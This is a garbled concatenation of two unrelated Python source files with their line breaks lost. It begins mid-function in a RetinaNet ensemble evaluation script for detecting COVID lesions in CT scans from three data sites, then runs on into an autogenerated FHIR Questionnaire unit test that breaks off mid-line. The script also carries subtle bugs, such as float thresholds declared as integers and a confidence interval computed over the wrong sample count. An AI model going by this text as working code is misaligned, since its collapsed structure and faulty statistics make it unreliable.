print(scores_sort.shape) # print(scores_sort) return scores_sort def _print_ensemble_detections_to_npy(args, generator, model_list, client_idx, client_name, patient_name, score_threshold=0.05, max_detections=100, save_path=None): all_detections = [[None for i in range(generator.num_classes()) if generator.has_label(i)] for j in range(generator.size())] detection_out = np.zeros([generator.size(),512,512,3]) # detection_out = np.zeros([generator.size(),512,512]) attention_out = np.zeros([generator.size(),512,512]) mask_out = np.zeros([generator.size(),512,512]) results = open(os.path.join(save_path, '{}_{}_output_bbox.csv'.format(client_name, patient_name)), 'w', newline='') result_writer = csv.writer(results, delimiter=',') for i in tqdm(range(generator.size()), desc='Running network on {} {}: '.format(client_name, patient_name)): raw_image = generator.load_image(i) # image = np.expand_dims(raw_image.copy(), axis=-1) # image = np.repeat(image, 3, axis=-1) # image = generator.preprocess_image(image) image = generator.preprocess_image(raw_image.copy()) image, scale = generator.resize_image(image) if keras.backend.image_data_format() == 'channels_first': image = image.transpose((2, 0, 1)) # run network # boxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))[:3] all_boxes = np.empty([1,0,4],dtype=np.float32) all_scores = np.empty([1,0], dtype=np.float32) all_labels = np.empty([1,0], dtype=np.int32) masks = np.zeros([1,512,512,1], dtype=np.float32) attention_map = np.zeros([1,512,512,1], dtype=np.float32) for site_model in model_list: site_boxes, site_scores, site_labels, site_masks, site_attention_map = site_model.predict_on_batch(np.expand_dims(image, axis=0)) site_boxes = site_boxes.numpy() site_scores = site_scores.numpy() site_labels = site_labels.numpy() site_masks = site_masks.numpy() site_attention_map = 
site_attention_map.numpy() if np.squeeze(site_attention_map).shape[0] !=512: resized_attn_map = cv2.resize(np.squeeze(site_attention_map),(512,512)) site_attention_map = np.expand_dims(resized_attn_map,axis=-1) site_attention_map = np.expand_dims(site_attention_map,axis=0) all_boxes = np.concatenate([all_boxes, site_boxes],axis=-2) all_scores = np.concatenate([all_scores, site_scores],axis=-1) all_labels = np.concatenate([all_labels, site_labels],axis=-1) masks = np.add(masks, site_masks/len(model_list)) attention_map = np.add(attention_map, site_attention_map/len(model_list)) # print('-------------EACH MODEL----------') # print('----boxes----') # print(type(site_boxes)) # print(site_boxes.shape) # print(site_boxes.dtype) # print('----scores----') # print(type(site_scores)) # print(site_scores.shape) # print(site_scores.dtype) # print('----labels----') # print(type(site_labels)) # print(site_labels.shape) # print(site_labels.dtype) # print('----masks----') # print(type(site_masks)) # print(site_masks.shape) # print(site_masks.dtype) # print('----attn map----') # print(type(site_attention_map)) # print(site_attention_map.shape) # print(site_attention_map.dtype) # print('total_boxes') # print(all_boxes.shape) # print(all_boxes.dtype) # print('total_scores') # print(all_scores.shape) # print(all_scores.dtype) # print('total_labels') # print(all_labels.shape) # print(all_labels.dtype) # print(np.squeeze(all_boxes).shape) # print(np.expand_dims(np.squeeze(all_scores),axis=-1).shape) out_boxes, out_scores, out_labels = filter_detections( np.squeeze(all_boxes), np.expand_dims(np.squeeze(all_scores),axis=-1), other=[], class_specific_filter=True, nms=True) out_boxes = np.expand_dims(np.squeeze(out_boxes),axis=0) out_scores = np.expand_dims(np.squeeze(out_scores),axis=0) out_labels = np.expand_dims(np.squeeze(out_labels),axis=0) # print('boxes:', out_boxes.shape) # print('scores:', out_scores.shape) # print('labels',out_labels.shape) boxes = out_boxes.copy() scores = out_scores.copy() labels = out_labels.copy() # correct boxes for image scale boxes /= scale # select indices which have a score above the threshold indices = np.where(scores[0, :] > -1)[0] # print('indices', indices) # print(type(scores)) if type(scores) is not np.ndarray: scores = scores.numpy() boxes = boxes.numpy() labels = labels.numpy() masks = masks.numpy() attention_map = attention_map.numpy() # select those scores scores = scores[0][indices] # find the order with which to sort the scores scores_sort = np.argsort(-scores)[:max_detections] image_boxes = boxes[0, indices[scores_sort], :] # print('seletec_boxes',image_boxes.shape) # print(image_boxes) # filter out of lung if args.lung_filter: client_paths = ['private_1', 'private_2', 'private_3'] # client_paths = ['private_4/B'] lung_filter_path = '/research/dept8/qdou/data/covid/{}/lung_seg_png/'.format(client_paths[client_idx]) # lungfilter = '/covid/private_2/lung_seg_png/ # print('---img path---') img_path = generator.image_path(i) patient = img_path.split('/')[-2] slice_idx = img_path.split('/')[-1].replace('slice_', '').replace('.h5', '') # print('patient:', patient) # print('slice:', slice_idx) seg_path = os.path.join(lung_filter_path,'{}_slice_{}.png').format(patient,slice_idx) # print(seg_path) seg = cv2.imread(seg_path) scores_sort = _seg_filter(image_boxes,scores_sort,seg) image_boxes = boxes[0, indices[scores_sort], :] image_scores = scores[scores_sort] image_labels = labels[0, indices[scores_sort]] image_detections = np.concatenate([image_boxes, 
np.expand_dims(image_scores, axis=1), np.expand_dims(image_labels, axis=1)], axis=1) # copy detections to all_detections for label in range(generator.num_classes()): if not generator.has_label(label): continue all_detections[i][label] = image_detections[image_detections[:, -1] == label, :-1] if args.save_result == 1: img_path = generator.image_path(i) img_path = img_path.replace('h5_normalize', 'h5') # print(img_path) with h5py.File(img_path, "r") as hf: h5_raw_image = hf['arr'][:] draw_annotations(h5_raw_image, generator.load_annotations(i), label_to_name=generator.label_to_name) # draw_detections(raw_image, image_boxes, image_scores, image_labels, score_threshold=args.score_threshold, label_to_name=generator.label_to_name) draw_detections(h5_raw_image, image_boxes, image_scores, image_labels, slice_id=i, bbox_writer=result_writer, score_threshold=args.score_threshold) # if args.lung_filter: # slice_idx = generator.image_path(i).split('/')[-1].replace('slice', '').replace('.png', '') # cv2.imwrite('../COVID/slice_{}.png'.format(slice_idx),raw_image) # print("Shape of load Image") # print(arr.shape) detection_out[i, :, :] = h5_raw_image attention_map[np.where(attention_map < args.attention_threshold)] = 0 # attention_out[i, :, :] = cv2.flip( cv2.resize(np.squeeze(np.uint8(attention_map * 255)), (origin_shape[1], origin_shape[0])), 0) attention_out[i, :, :] = cv2.resize(np.squeeze(np.uint8(attention_map * 255)), (512, 512)) masks[masks < args.segmentation_threshold] = 0 masks = cv2.resize(np.squeeze(np.uint8(masks * 255)), (512, 512)) mask_out[i, :, :] = masks if save_path is not None and args.save_result == 1: print('Writing Results...') # detection_out = sitk.GetImageFromArray(detection_out) # sitk.WriteImage(detection_out, os.path.join(save_path, '{}_{}_detection_result.nii.gz'.format(client_name, patient_name))) # attention_out = sitk.GetImageFromArray(attention_out) # sitk.WriteImage(attention_out, os.path.join(save_path, '{}_{}_attention_result.nii.gz'.format(client_name, patient_name))) mask_out = sitk.GetImageFromArray(mask_out) sitk.WriteImage(mask_out, os.path.join(save_path, '{}_{}_masks_result.nii.gz'.format(client_name, patient_name))) np.save(os.path.join(save_path, '{}_{}_prediction.npy'.format(client_name, patient_name)), all_detections) all_annotations, all_annotations_img_path = _get_annotations_and_img_path(generator) np.save(os.path.join(save_path, '{}_{}_annotations.npy'.format(client_name, patient_name)), all_annotations) np.save(os.path.join(save_path, '{}_{}_annotations_img_path.npy'.format(client_name, patient_name)), all_annotations_img_path) return 0 def parse_args(args): """ Parse the arguments. """ parser = argparse.ArgumentParser(description='Evaluation script for a RetinaNet network.') # subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type') # subparsers.required = True # csv_parser = subparsers.add_parser('csv') # csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for evaluation.') # csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.') parser.add_argument('--ensemble', help='Path to RetinaNet model.', default=False, action='store_true') parser.add_argument('--model', help='Path to RetinaNet model.', default=None) parser.add_argument('--weights', help='only load weights.', default=None) parser.add_argument('--nii', help='path to nii files.') parser.add_argument('--convert-model', help='Convert the model to an inference model (ie. 
the input is a training model).', action='store_true') parser.add_argument('--backbone', help='The backbone of the model.', default='vgg19') parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).') parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0) parser.add_argument('--score-threshold', help='Threshold on score to filter detections with (defaults to 0.05).', default=0.4, type=float) parser.add_argument('--iou-threshold', help='IoU Threshold to count for a positive detection (defaults to 0.5).', default=0.5, type=float) parser.add_argument('--max-detections', help='Max Detections per image (defaults to 100).', default=100, type=int) parser.add_argument('--detection-threshold', help='Threshold used for determining what detections to draw.', default=0.4, type=int) parser.add_argument('--segmentation-threshold', help='Threshold used for filter segmentation map.', default=0.1, type=int) parser.add_argument('--attention-threshold', help='Threshold used for filter attention map.', default=0.8, type=int) parser.add_argument('--save-path', help='Path for saving images with detections (doesn\'t work for COCO).',default=None) parser.add_argument('--get_predicted_bbox', help='Save predicted bbox to csv.', action='store_true') parser.add_argument('--save-result', help='Save result or not.', type=int, default=0) parser.add_argument('--lung-filter', help='Path for lung seg filter images', default=False, action='store_true') parser.add_argument('--draw-colorful', help='draw difficult type of predict with color', default=False, action='store_true') parser.add_argument('--reduce-fp', help='reduce fp, must use after completing first evaluation', default=False, action='store_true') parser.add_argument('--log', help='Path for saving log file', default=None) parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=512) parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=512) parser.add_argument('--config', help='Path to a configuration parameters .ini file (only used with --convert-model).') parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true') parser.add_argument('--dataset_type', help='Path to CSV file containing annotations for evaluation.', default='csv') parser.add_argument('--annotations', help='Path to CSV file containing annotations for evaluation.') parser.add_argument('--classes', help='Path to a CSV file containing class label mapping.', default='mapping.csv') return parser.parse_args(args) def main(args=None): # parse arguments if args is None: args = sys.argv[1:] args = parse_args(args) # make sure keras is the minimum required version check_keras_version() # optionally choose specific GPU if args.gpu: os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu # keras.backend.tensorflow_backend.set_session(get_session()) # make save path if it doesn't exist if args.save_path is not None and not os.path.exists(args.save_path): os.makedirs(args.save_path) # optionally load config parameters if args.config: args.config = read_config_file(args.config) anno_base_dir = '/research/dept8/qdou/data/covid/' args.classes = os.path.join(anno_base_dir, args.classes) # create the generator # print model summary # print(model.summary()) client_name = ['Dataset1', 'Dataset2', 'Dataset3'] data_path = 
['private_1/h5_normalize', 'private_2/h5_normalize', 'private_3/h5_normalize'] # data_path = ['private_1/h5_normalize_-1050_800', 'private_2/h5_normalize_-1050_800','private_3/h5_normalize_-1050_800'] # data_path = ['private_4/B/h5_normalize'] private_1 = ['P5_annotations_h5_whole_vol.csv'] private_2 = ['case1_annotations_h5_whole_vol.csv', 'case4_annotations_h5_whole_vol.csv'] private_3 = ['case19_annotations_h5_whole_vol.csv', 'case23_annotations_h5_whole_vol.csv', 'case40_annotations_h5_whole_vol.csv', 'case42_annotations_h5_whole_vol.csv', 'case46_annotations_h5_whole_vol.csv', 'case49_annotations_h5_whole_vol.csv', 'case51_annotations_h5_whole_vol.csv', 'case54_annotations_h5_whole_vol.csv', 'case58_annotations_h5_whole_vol.csv', 'case60_annotations_h5_whole_vol.csv', 'case61_annotations_h5_whole_vol.csv', 'case62_annotations_h5_whole_vol.csv'] private_4 = ['001_annotations_h5_whole_vol.csv', '005_annotations_h5_whole_vol.csv', '006_annotations_h5_whole_vol.csv', '008_annotations_h5_whole_vol.csv', '009_annotations_h5_whole_vol.csv', '010_annotations_h5_whole_vol.csv', '011_annotations_h5_whole_vol.csv', '012_annotations_h5_whole_vol.csv', '013_annotations_h5_whole_vol.csv', '014_annotations_h5_whole_vol.csv'] # test_data_list = ['test_private_1_all.csv', 'test_mos_all.csv'] test_data_list = [private_1, private_2, private_3] assert len(client_name) == len(data_path) == len(test_data_list) # generate patient name based on csv patient_names = {} for i in range(len(client_name)): for j in range(len(test_data_list[i])): if client_name[i] not in patient_names: patient_names[client_name[i]] = [] patient_names[client_name[i]].append(test_data_list[i][j].split('_')[0]) else: patient_names[client_name[i]].append(test_data_list[i][j].split('_')[0]) # start evaluation log_path = args.log if args.log else './evaluate_ensemble_internal_patient_wise_3_June.txt' logfile = open(log_path,'a') # save prediction to npy if args.get_predicted_bbox == 1: logfile.write('*********************************\n') logfile.write('Save prediction of ensemble model to .npy file\n'.format(args.model)) backbone = models.backbone(args.backbone) # optionally load anchor parameters anchor_params = None if args.config and 'anchor_parameters' in args.config: anchor_params = parse_anchor_parameters(args.config) # load model if args.ensemble: model_list = [] # model_path_list = ['/research/dept8/qdou/mrjiang/Impriving_retina/final_separate_model/private1/vgg19_nl_csv_15.h5', model_path_list = ['/research/dept8/qdou/mrjiang/Impriving_retina/federated_results/21_May_siteB_test_fold2/vgg19_nl_csv_15.h5', '/research/dept8/qdou/mrjiang/Impriving_retina/final_separate_model/private2/vgg19_nl_csv_07.h5', '/research/dept8/qdou/mrjiang/Impriving_retina/final_separate_model/private3/vgg19_nl_csv_17.h5'] for model_path in model_path_list: print('Loading {}...'.format(model_path.split('/')[-2]+model_path.split('/')[-1]),flush=True) model = models.load_model(model_path, backbone_name=args.backbone) if args.convert_model: model = models.convert_model(model, anchor_params=anchor_params) model_list.append(model) elif args.model is not None: print('Loading model, this may take a second...',flush=True) model = models.load_model(args.model, backbone_name=args.backbone) # optionally convert the model if args.convert_model: model = models.convert_model(model, anchor_params=anchor_params) elif args.weights is not None: weights = args.weights print('Creating model and Loading weights, this may take a second...',flush=True) model, training_model, 
prediction_model = create_models( backbone_retinanet=backbone.retinanet, # note : when mapping.csv only contains lesion,0, generator.num_classes() ==1 num_classes=1, weights=weights, multi_gpu=args.multi_gpu, freeze_backbone=False, config=args.config, model_config={} ) # optionally convert the model if args.convert_model: model = models.convert_model(model, anchor_params=anchor_params) else: raise ValueError("You have to specify a model") # create generator # generators = [] generators = {} for i in range(len(client_name)): for j in range(len(test_data_list[i])): args.annotations = os.path.join(anno_base_dir, data_path[i], test_data_list[i][j]) print('---client {}---'.format(client_name[i])) print('validation csv {}'.format(args.annotations)) generator = create_generator(args) if client_name[i] not in generators: generators[client_name[i]] = [] generators[client_name[i]].append(generator) else: generators[client_name[i]].append(generator) if args.lung_filter: print('do lung filter',flush=True) logfile.write('do lung filter\n') else: print('no lung filter',flush=True) for i in range(len(generators)): print('------client {}-----'.format(client_name[i])) for j in range(len(generators[client_name[i]])): logfile.write('Writing client {} patient {} prediction results to .npy... \n'.format(client_name[i], patient_names[client_name[i]])) print('------patient {}-----'.format(patient_names[client_name[i]][j])) generator = generators[client_name[i]][j] patient_name = patient_names[client_name[i]][j] if args.ensemble: _print_ensemble_detections_to_npy( args, generator, model_list, client_idx=i, client_name=client_name[i], patient_name=patient_name, score_threshold=args.score_threshold, max_detections=args.max_detections, save_path=args.save_path, ) else: raise ValueError("This is ensemble code") logfile.write('Finish writing \n') logfile.write('*********************************') sys.exit(0) # evaluate from npy logfile.write('*********************************\n') logfile.write('*{}*\n'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))) logfile.write('Evaluate ensemble model from .npy\n'.format(args.model)) logfile.write('thresshold:{}\n'.format(args.score_threshold)) for i in range(len(client_name)): print('client {}'.format(client_name[i])) client_tps, client_fps, client_num_annotations, client_num_slices = 0., 0., 0., 0. 
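        # The loop below aggregates per-patient detection counts in two ways: the
        # "total" metrics pool TP/FP across all patients of a client before computing
        # sensitivity / precision / FP-per-slice, while the "average" metrics average
        # the per-patient values. The 95% confidence intervals reported further down
        # use the normal approximation mean +/- 1.96 * std / sqrt(n) (note the original
        # code divides by len(test_data_list), i.e. the number of clients, at that
        # point). A minimal sketch of that calculation, with a hypothetical helper
        # name that is not part of the original script:
        #
        #   def normal_ci_95(values):
        #       values = np.asanyarray(values, dtype=float)
        #       return values.mean(), 1.96 * values.std() / np.sqrt(len(values))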
client_precision, client_recall, client_fp_slice = [], [], [] client_mAP = [] for j in range(len(test_data_list[i])): patient_name = patient_names[client_name[i]][j] average_precisions, old, new, num_annotations, num_slices = evaluate_from_npy( args, client_name=client_name[i], patient_name=patient_name, iou_threshold=args.iou_threshold, score_threshold=args.score_threshold, max_detections=args.max_detections, save_path=args.save_path, ) patient_tp = new[0] patient_fp = new[1] client_recall.append(new[2]) client_precision.append(new[3]) client_fp_slice.append(new[4]) client_tps += patient_tp client_fps += patient_fp client_num_annotations += num_annotations client_num_slices += num_slices if args.draw_colorful: draw_colorful_result(args, client_name=client_name[i], patient_name=patient_name, iou_threshold=args.iou_threshold, score_threshold=args.score_threshold, max_detections=args.max_detections, save_path=args.save_path) # print evaluation total_instances = [] precisions = [] for label, (average_precision, num_annotations) in average_precisions.items(): # print(' {:.0f} instances of class'.format(num_annotations), # 'lesion', 'with average precision: {:.4f}'.format(average_precision)) total_instances.append(num_annotations) precisions.append(average_precision) if sum(total_instances) == 0: print('No test instances found.') return if args.weighted_average: print(' mAP: {:.4f}'.format( sum([a * b for a, b in zip(total_instances, precisions)]) / sum(total_instances))) else: print(' mAP: {:.4f}'.format(sum(precisions) / sum(x > 0 for x in total_instances))) mAP = sum(precisions) / sum(x > 0 for x in total_instances) client_mAP.append(mAP) logfile.write('client:{} patient{}\n'.format(client_name[i], patient_name)) logfile.write(' TP:{} FP:{}\n'.format(patient_tp, patient_fp)) logfile.write(' FP/slice:{} Sensitivity:{} Precision:{}\n'.format(patient_fp / num_slices, patient_tp / num_annotations, patient_tp / (patient_tp + patient_fp))) logfile.write(' mAP:{}\n'.format(mAP)) client_total_recall = client_tps / client_num_annotations client_total_precision = client_tps / (client_tps + client_fps) clint_total_fp_slice = client_fps / client_num_slices client_avg_recall = sum(client_recall) / len(test_data_list[i]) client_avg_precision = sum(client_precision) / len(test_data_list[i]) client_avg_fp_slice = sum(client_fp_slice) / len(test_data_list[i]) avg_mAP = sum(client_mAP) / len(test_data_list[i]) # calc confidence interval client_mean_precision = np.mean(np.asanyarray(client_precision)) client_std_precision = np.std(np.asanyarray(client_precision)) client_se_precision = client_std_precision / np.sqrt(len(test_data_list)) client_p_value_precision = 1.96 * client_se_precision client_mean_recall = np.mean(np.asanyarray(client_recall)) client_p_value_recall = 1.96 * (np.std(np.asanyarray(client_recall)) / np.sqrt(len((test_data_list)))) client_mean_map = np.mean(np.asanyarray(client_mAP)) client_p_value_map = 1.96 * (np.std(np.asanyarray(client_mAP)) / np.sqrt(len((test_data_list)))) print('------{}------'.format(client_name[i])) print(' total:') print(' # TP:{} FP{}'.format(client_tps, client_fps)) print(' # FP/slice:{:.4f} Sensitivity:{:.5f} Precision:{:.5f}'.format(clint_total_fp_slice, client_total_recall, client_total_precision)) print(' average:') print(' # TP:{} FP{}'.format(client_tps, client_fps)) print(' # FP/slice:{:.4f} Sensitivity:{:.5f} Precision:{:.5f}'.format(client_avg_fp_slice, client_avg_recall, client_avg_precision)) print(' # mAP:{:.5f}'.format(avg_mAP)) print(' # 
Sensitivity:[{:.4f}+-{:.4f}] Precision:[{:.4f}+-{:.4f}] mAP:[{:.4f}+-{:.4f}]'.format( client_mean_recall, client_p_value_recall, client_mean_precision, client_p_value_precision, client_mean_map, client_p_value_map)) logfile.write(' total over client:{}\n'.format(client_name[i])) logfile.write(' TP:{} FP:{}\n'.format(client_tps, client_fps)) logfile.write(' FP/slice:{} Sensitivity:{} Precision:{}\n'.format(clint_total_fp_slice, client_total_recall, client_total_precision)) logfile.write(' Average over client:{}\n'.format(client_name[i])) logfile.write(' TP:{} FP:{}\n'.format(client_tps, client_fps)) logfile.write(' FP/slice:{} Sensitivity:{} Precision:{}\n'.format(client_avg_fp_slice, client_avg_recall, client_avg_precision)) logfile.write(' mAP:{}\n'.format(avg_mAP)) logfile.write('*********************************') logfile.flush() logfile.close() if __name__ == '__main__': main() #!/usr/bin/env python # -*- coding: utf-8 -*- # # Generated from FHIR 1.0.2.7202 on 2016-06-23. # 2016, SMART Health IT. import io import json import os import unittest from . import questionnaire from .fhirdate import FHIRDate class QuestionnaireTests(unittest.TestCase): def instantiate_from(self, filename): datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or '' with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle: js = json.load(handle) self.assertEqual("Questionnaire", js["resourceType"]) return questionnaire.Questionnaire(js) def testQuestionnaire1(self): inst = self.instantiate_from("questionnaire-example-bluebook.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire1(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire1(inst2) def implQuestionnaire1(self, inst): self.assertEqual(inst.date.date, FHIRDate("2013-02-19").date) self.assertEqual(inst.date.as_json(), "2013-02-19") self.assertEqual(inst.group.group[0].group[0].question[0].linkId, "nameOfChild") self.assertEqual(inst.group.group[0].group[0].question[0].text, "Name of child") self.assertEqual(inst.group.group[0].group[0].question[1].linkId, "sex") self.assertEqual(inst.group.group[0].group[0].question[1].text, "Sex") self.assertEqual(inst.group.group[0].group[1].linkId, "neonatalInformation") self.assertEqual(inst.group.group[0].group[1].question[0].linkId, "birthWeight") self.assertEqual(inst.group.group[0].group[1].question[0].text, "Birth weight (kg)") self.assertEqual(inst.group.group[0].group[1].question[1].linkId, "birthLength") self.assertEqual(inst.group.group[0].group[1].question[1].text, "Birth length (cm)") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].extension[0].url, "http://example.org/Profile/questionnaire#visibilityCondition") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].extension[0].valueString, "HAS_VALUE(../choice/code) AND NEQ(../choice/code,'NO')") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].linkId, "vitaminKgivenDoses") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[0].linkId, "vitaminiKDose1") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[0].text, "1st dose") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[1].linkId, "vitaminiKDose2") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[1].text, "2nd dose") self.assertEqual(inst.group.group[0].group[1].question[2].linkId, 
"vitaminKgiven") self.assertEqual(inst.group.group[0].group[1].question[2].text, "Vitamin K given") self.assertEqual(inst.group.group[0].group[1].question[3].group[0].question[0].linkId, "hepBgivenDate") self.assertEqual(inst.group.group[0].group[1].question[3].group[0].question[0].text, "Date given") self.assertEqual(inst.group.group[0].group[1].question[3].linkId, "hepBgiven") self.assertEqual(inst.group.group[0].group[1].question[3].text, "Hep B given y / n") self.assertEqual(inst.group.group[0].group[1].question[4].linkId, "abnormalitiesAtBirth") self.assertEqual(inst.group.group[0].group[1].question[4].text, "Abnormalities noted at birth") self.assertEqual(inst.group.group[0].group[1].title, "Neonatal Information") self.assertEqual(inst.group.group[0].linkId, "birthDetails") self.assertEqual(inst.group.group[0].title, "Birth details - To be completed by health professional") self.assertEqual(inst.group.linkId, "PHR") self.assertTrue(inst.group.required) self.assertEqual(inst.group.title, "NSW Government My Personal Health Record") self.assertEqual(inst.id, "bb") self.assertEqual(inst.publisher, "New South Wales Department of Health") self.assertEqual(inst.status, "draft") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") def testQuestionnaire2(self): inst = self.instantiate_from("questionnaire-example-f201-lifelines.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire2(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire2(inst2) def implQuestionnaire2(self, inst): self.assertEqual(inst.date.date, FHIRDate("2010").date) self.assertEqual(inst.date.as_json(), "2010") self.assertEqual(inst.group.concept[0].code, "VL 1-1, 18-65_1.2.2") self.assertEqual(inst.group.concept[0].display, "Lifelines Questionnaire 1 part 1") self.assertEqual(inst.group.concept[0].system, "http://example.org/system/code/lifelines/nl") self.assertEqual(inst.group.group[0].linkId, "1") self.assertEqual(inst.group.group[0].question[0].linkId, "1.1") self.assertEqual(inst.group.group[0].question[0].text, "Do you have allergies?") self.assertEqual(inst.group.group[1].linkId, "2") self.assertEqual(inst.group.group[1].question[0].linkId, "2.1") self.assertEqual(inst.group.group[1].question[0].text, "What is your gender?") self.assertEqual(inst.group.group[1].question[1].linkId, "2.2") self.assertEqual(inst.group.group[1].question[1].text, "What is your date of birth?") self.assertEqual(inst.group.group[1].question[2].linkId, "2.3") self.assertEqual(inst.group.group[1].question[2].text, "What is your country of birth?") self.assertEqual(inst.group.group[1].question[3].linkId, "2.4") self.assertEqual(inst.group.group[1].question[3].text, "What is your marital status?") self.assertEqual(inst.group.group[1].text, "General questions") self.assertEqual(inst.group.group[2].linkId, "3") self.assertEqual(inst.group.group[2].question[0].linkId, "3.1") self.assertEqual(inst.group.group[2].question[0].text, "Do you smoke?") self.assertEqual(inst.group.group[2].question[1].linkId, "3.2") self.assertEqual(inst.group.group[2].question[1].text, "Do you drink alchohol?") self.assertEqual(inst.group.group[2].title, "Intoxications") self.assertEqual(inst.group.linkId, "root") self.assertTrue(inst.group.required) self.assertEqual(inst.id, "f201") self.assertEqual(inst.status, "published") self.assertEqual(inst.subjectType[0], "Patient") 
self.assertEqual(inst.text.status, "generated") def testQuestionnaire3(self): inst = self.instantiate_from("questionnaire-example-gcs.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire3(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire3(inst2) def implQuestionnaire3(self, inst): self.assertEqual(inst.contained[0].id, "motor") self.assertEqual(inst.contained[1].id, "verbal") self.assertEqual(inst.contained[2].id, "eye") self.assertEqual(inst.date.date, FHIRDate("2015-08-03").date) self.assertEqual(inst.date.as_json(), "2015-08-03") self.assertEqual(inst.group.concept[0].code, "9269-2") self.assertEqual(inst.group.concept[0].system, "http://loinc.org") self.assertEqual(inst.group.linkId, "1") self.assertEqual(inst.group.question[0].concept[0].code, "9270-0") self.assertEqual(inst.group.question[0].concept[0].system, "http://loinc.org") self.assertEqual(inst.group.question[0].linkId, "1.1") self.assertEqual(inst.group.question[0].type, "choice") self.assertEqual(inst.group.question[1].concept[0].code, "9268-4") self.assertEqual(inst.group.question[1].concept[0].system, "http://loinc.org") self.assertEqual(inst.group.question[1].linkId, "1.2") self.assertEqual(inst.group.question[1].type, "choice") self.assertEqual(inst.group.question[2].concept[0].code, "9267-6") self.assertEqual(inst.group.question[2].concept[0].system, "http://loinc.org") self.assertEqual(inst.group.question[2].linkId, "1.3") self.assertEqual(inst.group.question[2].type, "choice") self.assertTrue(inst.group.required) self.assertEqual(inst.group.title, "Glasgow Coma Score") self.assertEqual(inst.id, "gcs") self.assertEqual(inst.publisher, "FHIR Project team") self.assertEqual(inst.status, "draft") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") def testQuestionnaire4(self): inst = self.instantiate_from("questionnaire-example.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire4(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire4(inst2) def implQuestionnaire4(self, inst): self.assertEqual(inst.contained[0].id, "yesno") self.assertEqual(inst.date.date, FHIRDate("2012-01").date) self.assertEqual(inst.date.as_json(), "2012-01") self.assertEqual(inst.group.group[0].concept[0].code, "COMORBIDITY") self.assertEqual(inst.group.group[0].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[0].linkId, "1.1") self.assertEqual(inst.group.group[0].question[0].concept[0].code, "COMORB") self.assertEqual(inst.group.group[0].question[0].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[0].question[0].group[0].concept[0].code, "CARDIAL") self.assertEqual(inst.group.group[0].question[0].group[0].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[0].question[0].group[0].linkId, "1.1.1.1") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].concept[0].code, "COMORBCAR") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].linkId, "1.1.1.1.1") 
self.assertEqual(inst.group.group[0].question[0].group[0].question[0].type, "choice") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[0].code, "COMCAR00") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[0].display, "Angina Pectoris") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[1].code, "194828000") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[1].display, "Angina (disorder)") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[1].system, "http://snomed.info/sct") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].linkId, "1.1.1.1.2") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].type, "choice") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].concept[0].code, "22298006") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].concept[0].display, "Myocardial infarction (disorder)") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].concept[0].system, "http://snomed.info/sct") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].linkId, "1.1.1.1.3") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].type, "choice") self.assertEqual(inst.group.group[0].question[0].group[1].concept[0].code, "VASCULAR") self.assertEqual(inst.group.group[0].question[0].group[1].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[0].question[0].group[1].linkId, "1.1.1.2") self.assertEqual(inst.group.group[0].question[0].linkId, "1.1.1") self.assertEqual(inst.group.group[0].question[0].type, "choice") self.assertEqual(inst.group.group[1].concept[0].code, "HISTOPATHOLOGY") self.assertEqual(inst.group.group[1].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[1].group[0].concept[0].code, 